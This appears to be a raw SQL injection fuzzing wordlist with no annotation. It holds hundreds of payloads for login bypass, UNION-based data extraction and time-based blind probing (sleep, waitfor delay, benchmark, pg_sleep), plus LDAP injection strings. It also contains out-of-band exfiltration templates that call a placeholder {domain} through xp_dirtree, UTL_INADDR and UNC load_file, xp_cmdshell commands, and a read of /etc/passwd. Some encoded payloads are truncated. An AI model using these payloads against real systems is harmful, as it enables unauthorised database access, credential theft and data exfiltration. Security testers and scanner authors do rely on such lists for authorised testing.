' '' \ \\ \' {base}-0 {base}*1 {base}'||' {base}'+' {base}' ' {base}'.' {base}',' " "" \" {base}"||" {base}"+" {base}"," {base}/*_*/ {base}/*x*/ {base}|0 '{base}' "{base}" ({base}) {base}'-- {base}')-- {base}');-- {base}'))-- {base}'));-- {base}')))-- {base}')));-- {base}'# {base}')# {base}');# {base}'))# {base}'));# {base}')))# {base}"# {base}")# {base}");# ' or 'z'='z 1 or 7=7 1 and 7=7 {base} or 7=7 {base} or 7=7-- {base} or 7=7# {base} or 7=7)-- {base} or 7=7)# {base}' or 7=7 {base}' or 7=7-- {base}' or 7=7# {base}' or 'z'='z {base}' or 'z'='z' or 'a'='b {base}'/**/or/**/'z'='z {base}' or username like '% {base}' or id like '% {base}' or user like '% {base}' or @version like '% {base}' or version() like '% {base}') or ('x'='x {base}')) or (('x'='x {base}' and 7=7 {base}' and 7=7-- {base}' and 7=7# {base}\' and 7=7-- {base}\' and 7=7# " or "z"="z {base}" or 7=7 {base}" or 7=7-- {base}" or 7=7# {base}" or "z"="z {base}" or "z"="z" or "a"="b {base}"/**/or/**/"z"="z {base}" or username like "% {base}" or id like "% {base}" or user like "% {base}" or @version like "% {base}" or version() like "% {base}") or ("x"="x {base}")) or (("x"="x {base}" and 7=7 {base}\" and 7=7-- {base}\" and 7=7# (select 1) (select from dual) (select {base}) ` */ /* --> #> %27 %22 %5c À§ Ä§ ï¼ À¢ Ä¢ ï¼ ' Å ï¹¨ ï¼¼ {base}||UTL_INADDR.get_host_address('{domain}') {base}'||UTL_INADDR.get_host_address('{domain}')||' {base}||extractvalue(xmltype('%xxx;]>'),'/l') {base}'||extractvalue(xmltype('%xxx;]>'),'/l')||' UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) {base} or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) {base} or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) (select load_file('\\\\{domain}\\c')) {base}'+(select load_file('\\\\{domain}\\e'))+' {base};EXEC master..xp_dirtree '\\{domain}\s'-- 1;EXEC master..xp_dirtree '\\{domain}\s'-- {base}';EXEC master..xp_dirtree '\\{domain}\s'-- {base}'EXEC master..xp_dirtree '\\{domain}\s'-- {base}');EXEC master..xp_dirtree '\\{domain}\s'-- {base};EXEC master..xp_dirtree "\\{domain}\s"-- 1;EXEC master..xp_dirtree "\\{domain}\s"-- {base}";EXEC master..xp_dirtree "\\{domain}\s"-- {base}");EXEC master..xp_dirtree "\\{domain}\s"-- {base}"='';EXEC master..xp_dirtree "\\{domain}\s"-- {base}"='');EXEC master..xp_dirtree "\\{domain}\s"-- {base};DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- 1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}');DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}";DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}");DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}"='';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}"='');DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}\';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}\";DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\{domain}\s');EXEC(@x)-- {base}' waitfor delay '0:0:20'-- {base} waitfor delay '0:0:20'-- ',0)waitfor delay'0:0:20'-- {base}'(select*from(select(sleep(20)))a)' {base}' (select*from(select(sleep(20)))a) ' {base}' and (select*from(select(sleep(20)))a)-- {base},(select*from(select(sleep(20)))a) @@version {base},@@version version() {base},version() select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename to_timestamp_tz tz_offset )%20or%20('x'='x %20or%201=1 ; execute immediate 'sel' || 'ect us' || 'er' benchmark(10000000,MD5(1))# update ";waitfor delay '0:0:__TIME__'-- 1) or pg_sleep(__TIME__)-- ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) hi"""") or (""""a""""=""""a""" delete like " or sleep(__TIME__)# pg_sleep(__TIME__)-- *(|(objectclass=*)) declare @q nvarchar (200) 0x730065006c00650063 ... or 0=0 # insert 1) or sleep(__TIME__)# ) or ('a'='a ; exec xp_regread *| @var select @var as var into temp end -- 1)) or benchmark(10000000,MD5(1))# asc (||6) a"""" or 3=3--""" " or benchmark(10000000,MD5(1))# # from wapiti or 0=0 -- 1 waitfor delay '0:0:10'-- or 'a'='a hi or 1=1 --" or a = a UNION ALL SELECT ) or sleep(__TIME__)=' )) or benchmark(10000000,MD5(1))# hi' or 'a'='a 0 21% limit or 1=1 or 2 > 1 ")) or benchmark(10000000,MD5(1))# PRINT hi') or ('a'='a or 3=3 ));waitfor delay '0:0:__TIME__'-- a' waitfor delay '0:0:10'-- 1;(load_file(char(47,101,116,99,47,112,97,115, ... or%201=1 1 or sleep(__TIME__)# or 1=1 and 1 in (select var from temp)-- or '7659'='7659 or 'text' = n'text' -- or 1=1 or ''=' declare @s varchar (200) select @s = 0x73656c6 ... exec xp ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 3.10E+17 or pg_sleep(__TIME__)--" x' AND email IS NULL; -- & admin' or ' or 'unusual' = 'unusual' // truncate 1) or benchmark(10000000,MD5(1))# \x27UNION SELECT declare @s varchar(200) select @s = 0x77616974 ... tz_offset sqlvuln "));waitfor delay '0:0:__TIME__'-- ||6 or%201=1 -- %2A%28%7C%28objectclass%3D%2A%29%29 or a=a ) union select * from information_schema.tables; PRINT @@variable or isNULL(1/0) /* 26 % or ""a""=""a" (sqlvuln) x' AND members.email IS NULL; -- or 1=1-- and 1=( if((load_file(char(110,46,101,120,11 ... 0x770061006900740066006F0072002000640065006C00 ... %20'sleep%2050' as 1)) or pg_sleep(__TIME__)-- /**/or/**/1/**/=/**/1 union all select @@version-- ,@variable (sqlattempt2) or (EXISTS) t'exec master..xp_cmdshell 'nslookup www.googl ... %20$(sleep%2050) 1 or benchmark(10000000,MD5(1))# %20or%20''=' ||UTL_HTTP.REQUEST or pg_sleep(__TIME__)-- hi' or 'x'='x'; ) or sleep(__TIME__)= or 'whatever' in ('whatever') ; begin declare @var varchar(8000) set @var=' ... union select 1,load_file('/etc/passwd'),1,1,1; 0x77616974666F722064656C61792027303A303A313027 ... exec(@s) ) or pg_sleep(__TIME__)-- union select or sleep(__TIME__)# select * from information_schema.tables-- a' or 1=1-- a' or 'a' = 'a declare @s varchar(22) select @s = or 2 between 1 and 3 or a=a-- or '1'='1 | or sleep(__TIME__)=' or 1 --' or 0=0 #" having a' " or isNULL(1/0) /* declare @s varchar (8000) select @s = 0x73656c ... â or 1=1 -- char%4039%41%2b%40SELECT order by bfilename having 1=1-- ) or benchmark(10000000,MD5(1))# or username like char(37); ;waitfor delay '0:0:__TIME__'-- or 1=1--" x' AND userid IS NULL; -- */* or 'text' > 't' '-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 == = ' ' -- ' # ' – '-- '/* '# " -- " # "/* ' and 1='1 ' and a='a or 1=1 or true ' or ''=' " or ""=" 1′) and '1′='1– ' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 and 1=1 and 1=1– ' and 'one'='one ' and 'one'='one– ' group by password having 1=1-- ' group by userid having 1=1-- ' group by username having 1=1-- like '%' or 0=0 -- or 0=0 # or 0=0 – ' or 0=0 # ' or 0=0 -- ' or 0=0 # ' or 0=0 – " or 0=0 -- " or 0=0 # " or 0=0 – %' or '0'='0 or 1=1 or 1=1-- or 1=1/* or 1=1# or 1=1– ' or 1=1-- ' or '1'='1 ' or '1'='1'-- ' or '1'='1'/* ' or '1'='1'# ' or '1′='1 ' or 1=1 ' or 1=1 -- ' or 1=1 – ' or 1=1-- ' or 1=1;# ' or 1=1/* ' or 1=1# ' or 1=1– ') or '1'='1 ') or '1'='1-- ') or '1'='1'-- ') or '1'='1'/* ') or '1'='1'# ') or ('1'='1 ') or ('1'='1-- ') or ('1'='1'-- ') or ('1'='1'/* ') or ('1'='1'# 'or'1=1 'or'1=1′ " or "1"="1 " or "1"="1"-- " or "1"="1"/* " or "1"="1"# " or 1=1 " or 1=1 -- " or 1=1 – " or 1=1-- " or 1=1/* " or 1=1# " or 1=1– ") or "1"="1 ") or "1"="1"-- ") or "1"="1"/* ") or "1"="1"# ") or ("1"="1 ") or ("1"="1"-- ") or ("1"="1"/* ") or ("1"="1"# ) or '1′='1– ) or ('1′='1– ' or 1=1 LIMIT 1;# 'or 1=1 or ''=' "or 1=1 or ""=" ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '% ' or user like '% ' or username like '% ' or 'x'='x ') or ('x'='x " or "x"="x ' OR 'x'='x'#; '=' 'or' and '=' 'or' ' UNION ALL SELECT 1, @@version;# ' UNION ALL SELECT system_user(),user();# ' UNION select table_schema,table_name FROM information_Schema.tables;# admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 (select top 1 or benchmark(10000000,MD5(1))# ");waitfor delay '0:0:__TIME__'-- a' or 3=3-- -- &password= group by userid having 1=1-- or ''=' ; exec master..xp_cmdshell %20or%20x=x select )) or sleep(__TIME__)=""" 0x730065006c0065006300740020004000400076006500 ... hi' or 1=1 -- ") or pg_sleep(__TIME__)-- %20or%20'x'='x or 'something' = 'some'+'thing' exec sp 29 % ( Ã½ or 1=1 -- 1 or pg_sleep(__TIME__)-- 0 or 1=1 ) or (a=a uni/**/on sel/**/ect replace %27%20or%201=1 )) or pg_sleep(__TIME__)-- %7C x' AND 1=(SELECT COUNT(*) FROM tabname); -- '%20OR ; or '1'='1' declare @q nvarchar (200) select @q = 0x770061 ... 1 or 1=1 ; exec ('sel' + 'ect us' + 'er') 23 OR 1=1 / anything' OR 'x'='x declare @q nvarchar (4000) select @q = or 0=0 -- desc ||'6 ) 1)) or sleep(__TIME__)# or 0=0 # select name from syscolumns where id = (sele ... hi or a=a *(|(mail=*)) password:*/=1-- distinct );waitfor delay '0:0:__TIME__'-- to_timestamp_tz ) or benchmark(10000000,MD5(1))#" %2A%28%7C%28mail%3D%2A%29%29 #NAME? or 1=1 /* )) or sleep(__TIME__)=' or 1=1 or ""= or 1 in (select @@version)-- sqlvuln; union select * from users where login = char ... x' or 1=1 or 'x'='y 28% â or 3=3 -- @variable or '1'='1'-- a" or 1=1-- //* %2A%7C " or 0=0 -- )) or pg_sleep(__TIME__)--" ? or 1/* ! ' or a = a declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) ' or 1=1 or 1=1 -- x' OR full_name LIKE '%Bob% '; exec master..xp_cmdshell 'ping 172.10.1.255'-- '%20or%20''=' '%20or%20'x'='x ')%20or%20('x'='x ' or 0=0 -- ' or 0=0 # or 0=0 #" ' or 1=1-- ' or '1'='1'-- ' or 1 --' or 1=1-- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a 'hi' or 'x'='x'; or procedure handler ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* <>"'%;)(&+ '%20or%201=1 'sqlattempt1 29% 26% ' or ''=' ' or 3=3 ' or 3=3 -- OR 1=1 OR 1=0 OR x=x OR x=y OR 1=1# OR 1=0# OR x=x# OR x=y# OR 1=1-- OR 1=0-- OR x=x-- OR x=y-- OR 3409=3409 AND ('pytW' LIKE 'pytW OR 3409=3409 AND ('pytW' LIKE 'pytY HAVING 1=1 HAVING 1=0 HAVING 1=1# HAVING 1=0# HAVING 1=1-- HAVING 1=0-- AND 1=1 AND 1=0 AND 1=1-- AND 1=0-- AND 1=1# AND 1=0# AND 1=1 AND '%'=' AND 1=0 AND '%'=' AND 1083=1083 AND (1427=1427 AND 7506=9091 AND (5913=5913 AND 1083=1083 AND ('1427=1427 AND 7506=9091 AND ('5913=5913 AND 7300=7300 AND 'pKlZ'='pKlZ AND 7300=7300 AND 'pKlZ'='pKlY AND 7300=7300 AND ('pKlZ'='pKlZ AND 7300=7300 AND ('pKlZ'='pKlY AS INJECTX WHERE 1=1 AND 1=1 AS INJECTX WHERE 1=1 AND 1=0 AS INJECTX WHERE 1=1 AND 1=1# AS INJECTX WHERE 1=1 AND 1=0# AS INJECTX WHERE 1=1 AND 1=1-- AS INJECTX WHERE 1=1 AND 1=0-- WHERE 1=1 AND 1=1 WHERE 1=1 AND 1=0 WHERE 1=1 AND 1=1# WHERE 1=1 AND 1=0# WHERE 1=1 AND 1=1-- WHERE 1=1 AND 1=0-- ORDER BY 1-- ORDER BY 2-- ORDER BY 3-- ORDER BY 4-- ORDER BY 5-- ORDER BY 6-- ORDER BY 7-- ORDER BY 8-- ORDER BY 9-- ORDER BY 10-- ORDER BY 11-- ORDER BY 12-- ORDER BY 13-- ORDER BY 14-- ORDER BY 15-- ORDER BY 16-- ORDER BY 17-- ORDER BY 18-- ORDER BY 19-- ORDER BY 20-- ORDER BY 21-- ORDER BY 22-- ORDER BY 23-- ORDER BY 24-- ORDER BY 25-- ORDER BY 26-- ORDER BY 27-- ORDER BY 28-- ORDER BY 29-- ORDER BY 30-- ORDER BY 31337-- ORDER BY 1# ORDER BY 2# ORDER BY 3# ORDER BY 4# ORDER BY 5# ORDER BY 6# ORDER BY 7# ORDER BY 8# ORDER BY 9# ORDER BY 10# ORDER BY 11# ORDER BY 12# ORDER BY 13# ORDER BY 14# ORDER BY 15# ORDER BY 16# ORDER BY 17# ORDER BY 18# ORDER BY 19# ORDER BY 20# ORDER BY 21# ORDER BY 22# ORDER BY 23# ORDER BY 24# ORDER BY 25# ORDER BY 26# ORDER BY 27# ORDER BY 28# ORDER BY 29# ORDER BY 30# ORDER BY 31337# ORDER BY 1 ORDER BY 2 ORDER BY 3 ORDER BY 4 ORDER BY 5 ORDER BY 6 ORDER BY 7 ORDER BY 8 ORDER BY 9 ORDER BY 10 ORDER BY 11 ORDER BY 12 ORDER BY 13 ORDER BY 14 ORDER BY 15 ORDER BY 16 ORDER BY 17 ORDER BY 18 ORDER BY 19 ORDER BY 20 ORDER BY 21 ORDER BY 22 ORDER BY 23 ORDER BY 24 ORDER BY 25 ORDER BY 26 ORDER BY 27 ORDER BY 28 ORDER BY 29 ORDER BY 30 ORDER BY 31337 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- %' AND 8310=8310 AND '%'=' %' AND 8310=8311 AND '%'=' and (select substring(@@version,1,1))='X' and (select substring(@@version,1,1))='M' and (select substring(@@version,2,1))='i' and (select substring(@@version,2,1))='y' and (select substring(@@version,3,1))='c' and (select substring(@@version,3,1))='S' and (select substring(@@version,3,1))='X' sleep(__TIME__)# 1 or sleep(__TIME__)# " or sleep(__TIME__)# ' or sleep(__TIME__)# " or sleep(__TIME__)=" ' or sleep(__TIME__)=' 1) or sleep(__TIME__)# ") or sleep(__TIME__)=" ') or sleep(__TIME__)=' 1)) or sleep(__TIME__)# ")) or sleep(__TIME__)=" ')) or sleep(__TIME__)=' ;waitfor delay '0:0:__TIME__'-- );waitfor delay '0:0:__TIME__'-- ';waitfor delay '0:0:__TIME__'-- ";waitfor delay '0:0:__TIME__'-- ');waitfor delay '0:0:__TIME__'-- ");waitfor delay '0:0:__TIME__'-- ));waitfor delay '0:0:__TIME__'-- '));waitfor delay '0:0:__TIME__'-- "));waitfor delay '0:0:__TIME__'-- benchmark(10000000,MD5(1))# 1 or benchmark(10000000,MD5(1))# " or benchmark(10000000,MD5(1))# ' or benchmark(10000000,MD5(1))# 1) or benchmark(10000000,MD5(1))# ") or benchmark(10000000,MD5(1))# ') or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))# # from wapiti sleep(5)# 1 or sleep(5)# " or sleep(5)# ' or sleep(5)# " or sleep(5)=" ' or sleep(5)=' 1) or sleep(5)# ") or sleep(5)=" ') or sleep(5)=' 1)) or sleep(5)# ")) or sleep(5)=" ')) or sleep(5)=' ;waitfor delay '0:0:5'-- );waitfor delay '0:0:5'-- ';waitfor delay '0:0:5'-- ";waitfor delay '0:0:5'-- ');waitfor delay '0:0:5'-- ");waitfor delay '0:0:5'-- ));waitfor delay '0:0:5'-- '));waitfor delay '0:0:5'-- "));waitfor delay '0:0:5'-- benchmark(10000000,MD5(1))# 1 or benchmark(10000000,MD5(1))# " or benchmark(10000000,MD5(1))# ' or benchmark(10000000,MD5(1))# 1) or benchmark(10000000,MD5(1))# ") or benchmark(10000000,MD5(1))# ') or benchmark(10000000,MD5(1))# 1)) or benchmark(10000000,MD5(1))# ")) or benchmark(10000000,MD5(1))# ')) or benchmark(10000000,MD5(1))# pg_sleep(5)-- 1 or pg_sleep(5)-- " or pg_sleep(5)-- ' or pg_sleep(5)-- 1) or pg_sleep(5)-- ") or pg_sleep(5)-- ') or pg_sleep(5)-- 1)) or pg_sleep(5)-- ")) or pg_sleep(5)-- ')) or pg_sleep(5)-- AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# SLEEP(5)# SLEEP(5)-- SLEEP(5)=" SLEEP(5)=' or SLEEP(5) or SLEEP(5)# or SLEEP(5)-- or SLEEP(5)=" or SLEEP(5)=' waitfor delay '00:00:05' waitfor delay '00:00:05'-- waitfor delay '00:00:05'# benchmark(50000000,MD5(1)) benchmark(50000000,MD5(1))-- benchmark(50000000,MD5(1))# or benchmark(50000000,MD5(1)) or benchmark(50000000,MD5(1))-- or benchmark(50000000,MD5(1))# pg_SLEEP(5) pg_SLEEP(5)-- pg_SLEEP(5)# or pg_SLEEP(5) or pg_SLEEP(5)-- or pg_SLEEP(5)# '\" AnD SLEEP(5) AnD SLEEP(5)-- AnD SLEEP(5)# &&SLEEP(5) &&SLEEP(5)-- &&SLEEP(5)# ' AnD SLEEP(5) ANd '1 '&&SLEEP(5)&&'1 ORDER BY SLEEP(5) ORDER BY SLEEP(5)-- ORDER BY SLEEP(5)# (SELECT * FROM (SELECT(SLEEP(5)))ecMj) (SELECT * FROM (SELECT(SLEEP(5)))ecMj)# (SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- +benchmark(3200,SHA1(1))+' + SLEEP(10) + ' RANDOMBLOB(500000000/2) AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) RANDOMBLOB(1000000000/2) AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ ORDER BY SLEEP(5) ORDER BY 1,SLEEP(5) ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')) ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ORDER BY SLEEP(5)# ORDER BY 1,SLEEP(5)# ORDER BY 1,SLEEP(5),3# ORDER BY 1,SLEEP(5),3,4# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# ORDER BY SLEEP(5)-- ORDER BY 1,SLEEP(5)-- ORDER BY 1,SLEEP(5),3-- ORDER BY 1,SLEEP(5),3,4-- ORDER BY 